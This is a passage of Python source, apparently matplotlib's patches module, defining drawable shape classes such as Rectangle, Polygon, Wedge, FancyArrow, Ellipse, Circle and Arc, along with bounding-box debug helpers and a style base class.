gc.set_hatch_color(self._hatch_color)
if self.get_sketch_params() is not None:
gc.set_sketch_params(*self.get_sketch_params())
if self.get_path_effects():
from matplotlib.patheffects import PathEffectRenderer
renderer = PathEffectRenderer(self.get_path_effects(), renderer)
# In `with _bind_draw_path_function(renderer) as draw_path: ...`
# (in the implementations of `draw()` below), calls to `draw_path(...)`
# will occur as if they took place here with `gc` inserted as
# additional first argument.
yield functools.partial(renderer.draw_path, gc)
gc.restore()
renderer.close_group('patch')
self.stale = False
@artist.allow_rasterization
def draw(self, renderer):
# docstring inherited
if not self.get_visible():
return
# Patch has traditionally ignored the dashoffset.
with cbook._setattr_cm(self, _dashoffset=0), \
self._bind_draw_path_function(renderer) as draw_path:
path = self.get_path()
transform = self.get_transform()
tpath = transform.transform_path_non_affine(path)
affine = transform.get_affine()
draw_path(tpath, affine,
# Work around a bug in the PDF and SVG renderers, which
# do not draw the hatches if the facecolor is fully
# transparent, but do if it is None.
self._facecolor if self._facecolor[3] else None)
def get_path(self):
"""Return the path of this patch."""
raise NotImplementedError('Derived must override')
def get_window_extent(self, renderer=None):
return self.get_path().get_extents(self.get_transform())
def _convert_xy_units(self, xy):
"""Convert x and y units for a tuple (x, y)."""
x = self.convert_xunits(xy[0])
y = self.convert_yunits(xy[1])
return x, y
patchdoc = artist.kwdoc(Patch)
for k in ['Rectangle', 'Circle', 'RegularPolygon', 'Polygon', 'Wedge', 'Arrow',
'FancyArrow', 'CirclePolygon', 'Ellipse', 'Arc', 'FancyBboxPatch',
'Patch']:
docstring.interpd.update({k: patchdoc})
# define Patch.__init__ docstring after the class has been added to interpd
docstring.dedent_interpd(Patch.__init__)
class Shadow(Patch):
def __str__(self):
return "Shadow(%s)" % (str(self.patch))
@cbook._delete_parameter("3.3", "props")
@docstring.dedent_interpd
def __init__(self, patch, ox, oy, props=None, **kwargs):
"""
Create a shadow of the given *patch*.
By default, the shadow will have the same face color as the *patch*,
but darkened.
Parameters
----------
patch : `.Patch`
The patch to create the shadow for.
ox, oy : float
The shift of the shadow in data coordinates, scaled by a factor
of dpi/72.
props : dict
*deprecated (use kwargs instead)* Properties of the shadow patch.
**kwargs
Properties of the shadow patch. Supported keys are:
%(Patch)s
"""
Patch.__init__(self)
self.patch = patch
# Note: when removing props, we can directly pass kwargs to _update()
# and remove self._props
if props is None:
color = .3 * np.asarray(colors.to_rgb(self.patch.get_facecolor()))
props = {
'facecolor': color,
'edgecolor': color,
'alpha': 0.5,
}
self._props = {**props, **kwargs}
self._ox, self._oy = ox, oy
self._shadow_transform = transforms.Affine2D()
self._update()
props = cbook._deprecate_privatize_attribute("3.3")
def _update(self):
self.update_from(self.patch)
# Place the shadow patch directly behind the inherited patch.
self.set_zorder(np.nextafter(self.patch.zorder, -np.inf))
self.update(self._props)
def _update_transform(self, renderer):
ox = renderer.points_to_pixels(self._ox)
oy = renderer.points_to_pixels(self._oy)
self._shadow_transform.clear().translate(ox, oy)
def _get_ox(self):
return self._ox
def _set_ox(self, ox):
self._ox = ox
def _get_oy(self):
return self._oy
def _set_oy(self, oy):
self._oy = oy
def get_path(self):
return self.patch.get_path()
def get_patch_transform(self):
return self.patch.get_patch_transform() + self._shadow_transform
def draw(self, renderer):
self._update_transform(renderer)
Patch.draw(self, renderer)
class Rectangle(Patch):
"""
A rectangle defined via an anchor point *xy* and its *width* and *height*.
The rectangle extends from ``xy[0]`` to ``xy[0] + width`` in x-direction
and from ``xy[1]`` to ``xy[1] + height`` in y-direction. ::
:     +------------------+
:     |                  |
:   height               |
:     |                  |
:    (xy)---- width -----+
One may picture *xy* as the bottom left corner, but which corner *xy* is
actually depends on the direction of the axis and the sign of *width*
and *height*; e.g. *xy* would be the bottom right corner if the x-axis
was inverted or if *width* was negative.
"""
def __str__(self):
pars = self._x0, self._y0, self._width, self._height, self.angle
fmt = "Rectangle(xy=(%g, %g), width=%g, height=%g, angle=%g)"
return fmt % pars
@docstring.dedent_interpd
def __init__(self, xy, width, height, angle=0.0, **kwargs):
"""
Parameters
----------
xy : (float, float)
The anchor point.
width : float
Rectangle width.
height : float
Rectangle height.
angle : float, default: 0
Rotation in degrees anti-clockwise about *xy*.
Other Parameters
----------------
**kwargs : `.Patch` properties
%(Patch)s
"""
Patch.__init__(self, **kwargs)
self._x0 = xy[0]
self._y0 = xy[1]
self._width = width
self._height = height
self._x1 = self._x0 + self._width
self._y1 = self._y0 + self._height
self.angle = float(angle)
# Note: This cannot be calculated until this is added to an Axes
self._rect_transform = transforms.IdentityTransform()
def get_path(self):
"""Return the vertices of the rectangle."""
return Path.unit_rectangle()
def _update_patch_transform(self):
"""
Notes
-----
This cannot be called until after this has been added to an Axes,
otherwise unit conversion will fail. This makes it very important to
call the accessor method and not directly access the transformation
member variable.
"""
x0, y0, x1, y1 = self._convert_units()
bbox = transforms.Bbox.from_extents(x0, y0, x1, y1)
rot_trans = transforms.Affine2D()
rot_trans.rotate_deg_around(x0, y0, self.angle)
self._rect_transform = transforms.BboxTransformTo(bbox)
self._rect_transform += rot_trans
def _update_x1(self):
self._x1 = self._x0 + self._width
def _update_y1(self):
self._y1 = self._y0 + self._height
def _convert_units(self):
"""Convert bounds of the rectangle."""
x0 = self.convert_xunits(self._x0)
y0 = self.convert_yunits(self._y0)
x1 = self.convert_xunits(self._x1)
y1 = self.convert_yunits(self._y1)
return x0, y0, x1, y1
def get_patch_transform(self):
self._update_patch_transform()
return self._rect_transform
def get_x(self):
"""Return the left coordinate of the rectangle."""
return self._x0
def get_y(self):
"""Return the bottom coordinate of the rectangle."""
return self._y0
def get_xy(self):
"""Return the left and bottom coords of the rectangle as a tuple."""
return self._x0, self._y0
def get_width(self):
"""Return the width of the rectangle."""
return self._width
def get_height(self):
"""Return the height of the rectangle."""
return self._height
def set_x(self, x):
"""Set the left coordinate of the rectangle."""
self._x0 = x
self._update_x1()
self.stale = True
def set_y(self, y):
"""Set the bottom coordinate of the rectangle."""
self._y0 = y
self._update_y1()
self.stale = True
def set_xy(self, xy):
"""
Set the left and bottom coordinates of the rectangle.
Parameters
----------
xy : (float, float)
"""
self._x0, self._y0 = xy
self._update_x1()
self._update_y1()
self.stale = True
def set_width(self, w):
"""Set the width of the rectangle."""
self._width = w
self._update_x1()
self.stale = True
def set_height(self, h):
"""Set the height of the rectangle."""
self._height = h
self._update_y1()
self.stale = True
def set_bounds(self, *args):
"""
Set the bounds of the rectangle as *left*, *bottom*, *width*, *height*.
The values may be passed as separate parameters or as a tuple::
set_bounds(left, bottom, width, height)
set_bounds((left, bottom, width, height))
.. ACCEPTS: (left, bottom, width, height)
"""
if len(args) == 1:
l, b, w, h = args[0]
else:
l, b, w, h = args
self._x0 = l
self._y0 = b
self._width = w
self._height = h
self._update_x1()
self._update_y1()
self.stale = True
def get_bbox(self):
"""Return the `.Bbox`."""
x0, y0, x1, y1 = self._convert_units()
return transforms.Bbox.from_extents(x0, y0, x1, y1)
xy = property(get_xy, set_xy)
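# --- Editor's sketch (standard pyplot usage, not part of this module):
# the rectangle rotates anti-clockwise about its anchor point *xy*.
# >>> import matplotlib.pyplot as plt
# >>> fig, ax = plt.subplots()
# >>> r = Rectangle((1, 1), width=2, height=1, angle=30, fill=False)
# >>> ax.add_patch(r)
# >>> r.get_bbox()   # unrotated extents: Bbox([[1, 1], [3, 2]])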
class RegularPolygon(Patch):
"""A regular polygon patch."""
def __str__(self):
s = "RegularPolygon((%g, %g), %d, radius=%g, orientation=%g)"
return s % (self._xy[0], self._xy[1], self._numVertices, self._radius,
self._orientation)
@docstring.dedent_interpd
def __init__(self, xy, numVertices, radius=5, orientation=0,
**kwargs):
"""
Parameters
----------
xy : (float, float)
The center position.
numVertices : int
The number of vertices.
radius : float
The distance from the center to each of the vertices.
orientation : float
The polygon rotation angle (in radians).
**kwargs
`Patch` properties:
%(Patch)s
"""
self._xy = xy
self._numVertices = numVertices
self._orientation = orientation
self._radius = radius
self._path = Path.unit_regular_polygon(numVertices)
self._poly_transform = transforms.Affine2D()
self._update_transform()
Patch.__init__(self, **kwargs)
def _update_transform(self):
self._poly_transform.clear() \
.scale(self.radius) \
.rotate(self.orientation) \
.translate(*self.xy)
@property
def xy(self):
return self._xy
@xy.setter
def xy(self, xy):
self._xy = xy
self._update_transform()
@property
def orientation(self):
return self._orientation
@orientation.setter
def orientation(self, orientation):
self._orientation = orientation
self._update_transform()
@property
def radius(self):
return self._radius
@radius.setter
def radius(self, radius):
self._radius = radius
self._update_transform()
@property
def numvertices(self):
return self._numVertices
@numvertices.setter
def numvertices(self, numVertices):
self._numVertices = numVertices
def get_path(self):
return self._path
def get_patch_transform(self):
self._update_transform()
return self._poly_transform
class PathPatch(Patch):
"""A general polycurve path patch."""
_edge_default = True
def __str__(self):
s = "PathPatch%d((%g, %g) ...)"
return s % (len(self._path.vertices), *tuple(self._path.vertices[0]))
@docstring.dedent_interpd
def __init__(self, path, **kwargs):
"""
*path* is a `~.path.Path` object.
Valid keyword arguments are:
%(Patch)s
"""
Patch.__init__(self, **kwargs)
self._path = path
def get_path(self):
return self._path
def set_path(self, path):
self._path = path
class Polygon(Patch):
"""A general polygon patch."""
def __str__(self):
s = "Polygon%d((%g, %g) ...)"
return s % (len(self._path.vertices), *tuple(self._path.vertices[0]))
@docstring.dedent_interpd
def __init__(self, xy, closed=True, **kwargs):
"""
*xy* is a numpy array with shape Nx2.
If *closed* is *True*, the polygon will be closed so the
starting and ending points are the same.
Valid keyword arguments are:
%(Patch)s
"""
Patch.__init__(self, **kwargs)
self._closed = closed
self.set_xy(xy)
def get_path(self):
"""Get the `.Path` of the polygon."""
return self._path
def get_closed(self):
"""Return whether the polygon is closed."""
return self._closed
def set_closed(self, closed):
"""
Set whether the polygon is closed.
Parameters
----------
closed : bool
True if the polygon is closed
"""
if self._closed == bool(closed):
return
self._closed = bool(closed)
self.set_xy(self.get_xy())
self.stale = True
def get_xy(self):
"""
Get the vertices of the path.
Returns
-------
(N, 2) numpy array
The coordinates of the vertices.
"""
return self._path.vertices
def set_xy(self, xy):
"""
Set the vertices of the polygon.
Parameters
----------
xy : (N, 2) array-like
The coordinates of the vertices.
Notes
-----
Unlike `~.path.Path`, we do not ignore the last input vertex. If the
polygon is meant to be closed, and the last point of the polygon is not
equal to the first, we assume that the user has not explicitly passed a
``CLOSEPOLY`` vertex, and add it ourselves.
"""
xy = np.asarray(xy)
nverts, _ = xy.shape
if self._closed:
# if the first and last vertex are the "same", then we assume that
# the user explicitly passed the CLOSEPOLY vertex. Otherwise, we
# have to append one since the last vertex will be "ignored" by
# Path
if nverts == 1 or nverts > 1 and (xy[0] != xy[-1]).any():
xy = np.concatenate([xy, [xy[0]]])
else:
# if we aren't closed, and the last vertex matches the first, then
# we assume we have an unnecessary CLOSEPOLY vertex and remove it
if nverts > 2 and (xy[0] == xy[-1]).all():
xy = xy[:-1]
self._path = Path(xy, closed=self._closed)
self.stale = True
xy = property(get_xy, set_xy,
doc='The vertices of the path as (N, 2) numpy array.')
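# --- Editor's sketch: the closing-vertex bookkeeping described in set_xy.
# >>> p = Polygon([[0, 0], [1, 0], [0, 1]], closed=True)
# >>> len(p.get_xy())   # first vertex re-appended to close the path
# 4
# >>> p.set_closed(False)
# >>> len(p.get_xy())   # duplicate closing vertex dropped again
# 3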
class Wedge(Patch):
"""Wedge shaped patch."""
def __str__(self):
pars = (self.center[0], self.center[1], self.r,
self.theta1, self.theta2, self.width)
fmt = "Wedge(center=(%g, %g), r=%g, theta1=%g, theta2=%g, width=%s)"
return fmt % pars
@docstring.dedent_interpd
def __init__(self, center, r, theta1, theta2, width=None, **kwargs):
"""
A wedge centered at *x*, *y* center with radius *r* that
sweeps *theta1* to *theta2* (in degrees). If *width* is given,
then a partial wedge is drawn from inner radius *r* - *width*
to outer radius *r*.
Valid keyword arguments are:
%(Patch)s
"""
Patch.__init__(self, **kwargs)
self.center = center
self.r, self.width = r, width
self.theta1, self.theta2 = theta1, theta2
self._patch_transform = transforms.IdentityTransform()
self._recompute_path()
def _recompute_path(self):
# Inner and outer rings are connected unless the annulus is complete
if abs((self.theta2 - self.theta1) - 360) <= 1e-12:
theta1, theta2 = 0, 360
connector = Path.MOVETO
else:
theta1, theta2 = self.theta1, self.theta2
connector = Path.LINETO
# Form the outer ring
arc = Path.arc(theta1, theta2)
if self.width is not None:
# Partial annulus needs to draw the outer ring
# followed by a reversed and scaled inner ring
v1 = arc.vertices
v2 = arc.vertices[::-1] * (self.r - self.width) / self.r
v = np.vstack([v1, v2, v1[0, :], (0, 0)])
c = np.hstack([arc.codes, arc.codes, connector, Path.CLOSEPOLY])
c[len(arc.codes)] = connector
else:
# Wedge doesn't need an inner ring
v = np.vstack([arc.vertices, [(0, 0), arc.vertices[0, :], (0, 0)]])
c = np.hstack([arc.codes, [connector, connector, Path.CLOSEPOLY]])
# Shift and scale the wedge to the final location.
v *= self.r
v += np.asarray(self.center)
self._path = Path(v, c)
def set_center(self, center):
self._path = None
self.center = center
self.stale = True
def set_radius(self, radius):
self._path = None
self.r = radius
self.stale = True
def set_theta1(self, theta1):
self._path = None
self.theta1 = theta1
self.stale = True
def set_theta2(self, theta2):
self._path = None
self.theta2 = theta2
self.stale = True
def set_width(self, width):
self._path = None
self.width = width
self.stale = True
def get_path(self):
if self._path is None:
self._recompute_path()
return self._path
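# --- Editor's sketch: the *width* parameter turns a filled wedge into a
# partial annulus, as described in the constructor docstring.
# >>> w1 = Wedge((0, 0), r=1, theta1=0, theta2=270)             # pie slice
# >>> w2 = Wedge((0, 0), r=1, theta1=0, theta2=270, width=0.3)  # ring segment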
# COVERAGE NOTE: Not used internally or from examples
class Arrow(Patch):
"""An arrow patch."""
def __str__(self):
return "Arrow()"
_path = Path([[0.0, 0.1], [0.0, -0.1],
[0.8, -0.1], [0.8, -0.3],
[1.0, 0.0], [0.8, 0.3],
[0.8, 0.1], [0.0, 0.1]],
closed=True)
@docstring.dedent_interpd
def __init__(self, x, y, dx, dy, width=1.0, **kwargs):
"""
Draws an arrow from (*x*, *y*) to (*x* + *dx*, *y* + *dy*).
The width of the arrow is scaled by *width*.
Parameters
----------
x : float
x coordinate of the arrow tail.
y : float
y coordinate of the arrow tail.
dx : float
Arrow length in the x direction.
dy : float
Arrow length in the y direction.
width : float, default: 1
Scale factor for the width of the arrow. With a default value of 1,
the tail width is 0.2 and head width is 0.6.
**kwargs
Keyword arguments control the `Patch` properties:
%(Patch)s
See Also
--------
FancyArrow
Patch that allows independent control of the head and tail
properties.
"""
super().__init__(**kwargs)
self._patch_transform = (
transforms.Affine2D()
.scale(np.hypot(dx, dy), width)
.rotate(np.arctan2(dy, dx))
.translate(x, y)
.frozen())
def get_path(self):
return self._path
def get_patch_transform(self):
return self._patch_transform
class FancyArrow(Polygon):
"""
Like Arrow, but lets you set head width and head height independently.
"""
_edge_default = True
def __str__(self):
return "FancyArrow()"
@docstring.dedent_interpd
def __init__(self, x, y, dx, dy, width=0.001, length_includes_head=False,
head_width=None, head_length=None, shape='full', overhang=0,
head_starts_at_zero=False, **kwargs):
"""
Parameters
----------
width : float, default: 0.001
Width of full arrow tail.
length_includes_head : bool, default: False
True if head is to be counted in calculating the length.
head_width : float or None, default: 3*width
Total width of the full arrow head.
head_length : float or None, default: 1.5*head_width
Length of arrow head.
shape : {'full', 'left', 'right'}, default: 'full'
Draw the left-half, right-half, or full arrow.
overhang : float, default: 0
Fraction that the arrow is swept back (0 overhang means
triangular shape). Can be negative or greater than one.
head_starts_at_zero : bool, default: False
If True, the head starts being drawn at coordinate 0
instead of ending at coordinate 0.
**kwargs
`.Patch` properties:
%(Patch)s
"""
if head_width is None:
head_width = 3 * width
if head_length is None:
head_length = 1.5 * head_width
distance = np.hypot(dx, dy)
if length_includes_head:
length = distance
else:
length = distance + head_length
if not length:
verts = np.empty([0, 2]) # display nothing if empty
else:
# start by drawing horizontal arrow, point at (0, 0)
hw, hl, hs, lw = head_width, head_length, overhang, width
left_half_arrow = np.array([
[0.0, 0.0], # tip
[-hl, -hw / 2], # leftmost
[-hl * (1 - hs), -lw / 2], # meets stem
[-length, -lw / 2], # bottom left
[-length, 0],
])
# if we're not including the head, shift the arrow forward along x
# by the head length
if not length_includes_head:
left_half_arrow += [head_length, 0]
# if the head starts at 0, shift forward along x by another half head length
if head_starts_at_zero:
left_half_arrow += [head_length / 2, 0]
# figure out the shape, and complete accordingly
if shape == 'left':
coords = left_half_arrow
else:
right_half_arrow = left_half_arrow * [1, -1]
if shape == 'right':
coords = right_half_arrow
elif shape == 'full':
# The half-arrows contain the midpoint of the stem,
# which we can omit from the full arrow. Including it
# twice caused a problem with xpdf.
coords = np.concatenate([left_half_arrow[:-1],
right_half_arrow[-2::-1]])
else:
raise ValueError("Got unknown shape: %s" % shape)
if distance != 0:
cx = dx / distance
sx = dy / distance
else:
# Account for division by zero
cx, sx = 0, 1
M = [[cx, sx], [-sx, cx]]
verts = np.dot(coords, M) + (x + dx, y + dy)
super().__init__(verts, closed=True, **kwargs)
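# --- Editor's sketch: head and tail geometry are set independently, unlike
# Arrow above (Axes.arrow builds exactly this patch).
# >>> import matplotlib.pyplot as plt
# >>> fig, ax = plt.subplots()
# >>> a = FancyArrow(0, 0, 1, 1, width=0.05, head_width=0.2,
# ...                head_length=0.3, length_includes_head=True)
# >>> ax.add_patch(a)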
docstring.interpd.update(
FancyArrow="\n".join(inspect.getdoc(FancyArrow.__init__).splitlines()[2:]))
class CirclePolygon(RegularPolygon):
"""A polygon-approximation of a circle patch."""
def __str__(self):
s = "CirclePolygon((%g, %g), radius=%g, resolution=%d)"
return s % (self._xy[0], self._xy[1], self._radius, self._numVertices)
@docstring.dedent_interpd
def __init__(self, xy, radius=5,
resolution=20, # the number of vertices
** kwargs):
"""
Create a circle at *xy* = (*x*, *y*) with given *radius*.
This circle is approximated by a regular polygon with *resolution*
sides. For a smoother circle drawn with splines, see `Circle`.
Valid keyword arguments are:
%(Patch)s
"""
RegularPolygon.__init__(self, xy,
resolution,
radius,
orientation=0,
**kwargs)
class Ellipse(Patch):
"""A scale-free ellipse."""
def __str__(self):
pars = (self._center[0], self._center[1],
self.width, self.height, self.angle)
fmt = "Ellipse(xy=(%s, %s), width=%s, height=%s, angle=%s)"
return fmt % pars
@docstring.dedent_interpd
def __init__(self, xy, width, height, angle=0, **kwargs):
"""
Parameters
----------
xy : (float, float)
xy coordinates of ellipse centre.
width : float
Total length (diameter) of horizontal axis.
height : float
Total length (diameter) of vertical axis.
angle : float, default: 0
Rotation in degrees anti-clockwise.
Notes
-----
Valid keyword arguments are:
%(Patch)s
"""
Patch.__init__(self, **kwargs)
self._center = xy
self._width, self._height = width, height
self._angle = angle
self._path = Path.unit_circle()
# Note: This cannot be calculated until this is added to an Axes
self._patch_transform = transforms.IdentityTransform()
def _recompute_transform(self):
"""
Notes
-----
This cannot be called until after this has been added to an Axes,
otherwise unit conversion will fail. This makes it very important to
call the accessor method and not directly access the transformation
member variable.
"""
center = (self.convert_xunits(self._center[0]),
self.convert_yunits(self._center[1]))
width = self.convert_xunits(self._width)
height = self.convert_yunits(self._height)
self._patch_transform = transforms.Affine2D() \
.scale(width * 0.5, height * 0.5) \
.rotate_deg(self.angle) \
.translate(*center)
def get_path(self):
"""Return the path of the ellipse."""
return self._path
def get_patch_transform(self):
self._recompute_transform()
return self._patch_transform
def set_center(self, xy):
"""
Set the center of the ellipse.
Parameters
----------
xy : (float, float)
"""
self._center = xy
self.stale = True
def get_center(self):
"""Return the center of the ellipse."""
return self._center
center = property(get_center, set_center)
def set_width(self, width):
"""
Set the width of the ellipse.
Parameters
----------
width : float
"""
self._width = width
self.stale = True
def get_width(self):
"""
Return the width of the ellipse.
"""
return self._width
width = property(get_width, set_width)
def set_height(self, height):
"""
Set the height of the ellipse.
Parameters
----------
height : float
"""
self._height = height
self.stale = True
def get_height(self):
"""Return the height of the ellipse."""
return self._height
height = property(get_height, set_height)
def set_angle(self, angle):
"""
Set the angle of the ellipse.
Parameters
----------
angle : float
"""
self._angle = angle
self.stale = True
def get_angle(self):
"""Return the angle of the ellipse."""
return self._angle
angle = property(get_angle, set_angle)
class Circle(Ellipse):
"""A circle patch."""
def __str__(self):
pars = self.center[0], self.center[1], self.radius
fmt = "Circle(xy=(%g, %g), radius=%g)"
return fmt % pars
@docstring.dedent_interpd
def __init__(self, xy, radius=5, **kwargs):
"""
Create a true circle at center *xy* = (*x*, *y*) with given *radius*.
Unlike `CirclePolygon` which is a polygonal approximation, this uses
Bezier splines and is much closer to a scale-free circle.
Valid keyword arguments are:
%(Patch)s
"""
Ellipse.__init__(self, xy, radius * 2, radius * 2, **kwargs)
self.radius = radius
def set_radius(self, radius):
"""
Set the radius of the circle.
Parameters
----------
radius : float
"""
self.width = self.height = 2 * radius
self.stale = True
def get_radius(self):
"""Return the radius of the circle."""
return self.width / 2.
radius = property(get_radius, set_radius)
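# --- Editor's sketch: spline circle vs. polygonal approximation.
# >>> c1 = Circle((0, 0), radius=2)                        # 8 Bezier arcs
# >>> c2 = CirclePolygon((0, 0), radius=2, resolution=20)  # 20 straight sides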
class Arc(Ellipse):
"""
An elliptical arc, i.e. a segment of an ellipse.
Due to internal optimizations, there are certain restrictions on using Arc:
- The arc cannot be filled.
- The arc must be used in an `~.axes.Axes` instance. It can not be added
directly to a `.Figure` because it is optimized to only render the
segments that are inside the axes bounding box with high resolution.
"""
def __str__(self):
pars = (self.center[0], self.center[1], self.width,
self.height, self.angle, self.theta1, self.theta2)
fmt = ("Arc(xy=(%g, %g), width=%g, "
"height=%g, angle=%g, theta1=%g, theta2=%g)")
return fmt % pars
@docstring.dedent_interpd
def __init__(self, xy, width, height, angle=0.0,
theta1=0.0, theta2=360.0, **kwargs):
"""
Parameters
----------
xy : (float, float)
The center of the ellipse.
width : float
The length of the horizontal axis.
height : float
The length of the vertical axis.
angle : float
Rotation of the ellipse in degrees (counterclockwise).
theta1, theta2 : float, default: 0, 360
Starting and ending angles of the arc in degrees. These values
are relative to *angle*, e.g. if *angle* = 45 and *theta1* = 90
the absolute starting angle is 135.
Default *theta1* = 0, *theta2* = 360, i.e. a complete ellipse.
The arc is drawn in the counterclockwise direction.
Angles greater than or equal to 360, or smaller than 0, are
represented by an equivalent angle in the range [0, 360), by
taking the input value mod 360.
Other Parameters
----------------
**kwargs : `.Patch` properties
Most `.Patch` properties are supported as keyword arguments,
with the exception of *fill* and *facecolor* because filling is
not supported.
%(Patch)s
"""
fill = kwargs.setdefault('fill', False)
if fill:
raise ValueError("Arc objects can not be filled")
Ellipse.__init__(self, xy, width, height, angle, **kwargs)
self.theta1 = theta1
self.theta2 = theta2
@artist.allow_rasterization
def draw(self, renderer):
"""
Draw the arc to the given *renderer*.
Notes
-----
Ellipses are normally drawn using an approximation that uses
eight cubic Bezier splines. The error of this approximation
is 1.89818e-6, according to this unverified source:
Lancaster, Don. *Approximating a Circle or an Ellipse Using
Four Bezier Cubic Splines.*
https://www.tinaja.com/glib/ellipse4.pdf
There is a use case where very large ellipses must be drawn
with very high accuracy, and it is too expensive to render the
entire ellipse with enough segments (either splines or line
segments). Therefore, in the case where either radius of the
ellipse is large enough that the error of the spline
approximation will be visible (greater than one pixel offset
from the ideal), a different technique is used.
In that case, only the visible parts of the ellipse are drawn,
with each visible arc using a fixed number of spline segments
(8). The algorithm proceeds as follows:
1. The points where the ellipse intersects the axes bounding
box are located. (This is done by performing an inverse
transformation on the axes bbox such that it is relative
to the unit circle -- this makes the intersection
calculation much easier than doing rotated ellipse
intersection directly).
This uses the "line intersecting a circle" algorithm from:
Vince, John. *Geometry for Computer Graphics: Formulae,
Examples & Proofs.* London: Springer-Verlag, 2005.
2. The angles of each of the intersection points are calculated.
3. Proceeding counterclockwise starting in the positive
x-direction, each of the visible arc-segments between the
pairs of vertices are drawn using the Bezier arc
approximation technique implemented in `.Path.arc`.
"""
if not hasattr(self, 'axes'):
raise RuntimeError('Arcs can only be used in Axes instances')
if not self.get_visible():
return
self._recompute_transform()
width = self.convert_xunits(self.width)
height = self.convert_yunits(self.height)
# If the width and height of ellipse are not equal, take into account
# stretching when calculating angles to draw between
def theta_stretch(theta, scale):
theta = np.deg2rad(theta)
x = np.cos(theta)
y = np.sin(theta)
stheta = np.rad2deg(np.arctan2(scale * y, x))
# arctan2 has the range [-pi, pi], we expect [0, 2*pi]
return (stheta + 360) % 360
theta1 = self.theta1
theta2 = self.theta2
if (
# if we need to stretch the angles because we are distorted
width != height
# and we are not doing a full circle.
#
# 0 and 360 do not exactly round-trip through the angle
# stretching (due to both float precision limitations and
# the difference between the range of arctan2 [-pi, pi] and
# this method [0, 360]) so avoid doing it if we don't have to.
and not (theta1 != theta2 and theta1 % 360 == theta2 % 360)
):
theta1 = theta_stretch(self.theta1, width / height)
theta2 = theta_stretch(self.theta2, width / height)
# Get width and height in pixels we need to use
# `self.get_data_transform` rather than `self.get_transform`
# because we want the transform from dataspace to the
# screen space to estimate how big the arc will be in physical
# units when rendered (the transform that we get via
# `self.get_transform()` goes from an idealized unit-radius
# space to screen space).
data_to_screen_trans = self.get_data_transform()
pwidth, pheight = (data_to_screen_trans.transform((width, height)) -
data_to_screen_trans.transform((0, 0)))
inv_error = (1.0 / 1.89818e-6) * 0.5
if pwidth < inv_error and pheight < inv_error:
self._path = Path.arc(theta1, theta2)
return Patch.draw(self, renderer)
def line_circle_intersect(x0, y0, x1, y1):
dx = x1 - x0
dy = y1 - y0
dr2 = dx * dx + dy * dy
D = x0 * y1 - x1 * y0
D2 = D * D
discrim = dr2 - D2
if discrim >= 0.0:
sign_dy = np.copysign(1, dy) # +/-1, never 0.
sqrt_discrim = np.sqrt(discrim)
return np.array(
[[(D * dy + sign_dy * dx * sqrt_discrim) / dr2,
(-D * dx + abs(dy) * sqrt_discrim) / dr2],
[(D * dy - sign_dy * dx * sqrt_discrim) / dr2,
(-D * dx - abs(dy) * sqrt_discrim) / dr2]])
else:
return np.empty((0, 2))
def segment_circle_intersect(x0, y0, x1, y1):
epsilon = 1e-9
if x1 < x0:
x0e, x1e = x1, x0
else:
x0e, x1e = x0, x1
if y1 < y0:
y0e, y1e = y1, y0
else:
y0e, y1e = y0, y1
xys = line_circle_intersect(x0, y0, x1, y1)
xs, ys = xys.T
return xys[
(x0e - epsilon < xs) & (xs < x1e + epsilon)
& (y0e - epsilon < ys) & (ys < y1e + epsilon)
]
# Transforms the axes box_path so that it is relative to the unit
# circle in the same way that it is relative to the desired ellipse.
box_path_transform = (transforms.BboxTransformTo(self.axes.bbox)
+ self.get_transform().inverted())
box_path = Path.unit_rectangle().transformed(box_path_transform)
thetas = set()
# For each of the point pairs, there is a line segment
for p0, p1 in zip(box_path.vertices[:-1], box_path.vertices[1:]):
xy = segment_circle_intersect(*p0, *p1)
x, y = xy.T
            # arctan2 returns [-pi, pi); the rest of our angles are in
            # [0, 360], so adjust as needed.
theta = (np.rad2deg(np.arctan2(y, x)) + 360) % 360
thetas.update(theta[(theta1 < theta) & (theta < theta2)])
thetas = sorted(thetas) + [theta2]
last_theta = theta1
theta1_rad = np.deg2rad(theta1)
inside = box_path.contains_point(
(np.cos(theta1_rad), np.sin(theta1_rad))
)
# save original path
path_original = self._path
for theta in thetas:
if inside:
self._path = Path.arc(last_theta, theta, 8)
Patch.draw(self, renderer)
inside = False
else:
inside = True
last_theta = theta
# restore original path
self._path = path_original
def bbox_artist(artist, renderer, props=None, fill=True):
"""
A debug function to draw a rectangle around the bounding
box returned by an artist's `.Artist.get_window_extent`
to test whether the artist is returning the correct bbox.
*props* is a dict of rectangle props with the additional property
'pad' that sets the padding around the bbox in points.
"""
if props is None:
props = {}
props = props.copy() # don't want to alter the pad externally
pad = props.pop('pad', 4)
pad = renderer.points_to_pixels(pad)
bbox = artist.get_window_extent(renderer)
r = Rectangle(
xy=(bbox.x0 - pad / 2, bbox.y0 - pad / 2),
width=bbox.width + pad, height=bbox.height + pad,
fill=fill, transform=transforms.IdentityTransform(), clip_on=False)
r.update(props)
r.draw(renderer)
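# Example (hedged sketch): bbox_artist is a debug helper meant to be called
# during a draw pass, when a renderer is available; e.g., for some existing
# artist `t` and figure `fig` (both assumed, not defined here):
#
#     def on_draw(event):
#         bbox_artist(t, event.renderer, props={'pad': 6})
#
#     fig.canvas.mpl_connect('draw_event', on_draw)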
def draw_bbox(bbox, renderer, color='k', trans=None):
"""
    A debug function to draw a rectangle around a given bounding box,
    e.g. one returned by an artist's `.Artist.get_window_extent`, to
    test whether the artist is returning the correct bbox.
"""
r = Rectangle(xy=(bbox.x0, bbox.y0), width=bbox.width, height=bbox.height,
edgecolor=color, fill=False, clip_on=False)
if trans is not None:
r.set_transform(trans)
r.draw(renderer)
def _simpleprint_styles(_styles):
"""
A helper function for the _Style class. Given the dictionary of
{stylename: styleclass}, return a string rep of the list of keys.
Used to update the documentation.
"""
return "[{}]".format("|".join(map(" '{}' ".format, sorted(_styles))))
class _Style:
"""
A base class for the Styles. It is meant to be a container class,
    where actual styles are declared as subclasses of it, and it
provides some helper functions.
"""
def __new__(cls, stylename, **kw):
"""Return the instance of the subclass with the given style name."""
# The "class" should have the _style_list attribute, which is a mapping
# of style names to style classes.
_list = stylename.replace(" ", "").split(",")
_name = _list[0].lower()
try:
_cls = cls._style_list[_name]
except KeyError as err:
raise ValueError("Unknown style : %s" % stylename) from err
try:
_args_pair = [cs.split("=") for cs in _list[1:]]
_args = {k: float(v) for k, v in _args_pair}
except ValueError as err:
raise ValueError("Incorrect style argument : %s" %
stylename) from err
_args.update(kw)
return _cls(**_args)
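    # Example (hedged sketch): given the parsing above, for a subclass such
    # as BoxStyle the following two spellings construct the same style:
    #
    #     BoxStyle("round,pad=0.2")
    #     BoxStyle("round", pad=0.2)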
@classmethod
def get_styles(cls):
"""Return a dictionary of available styles."""
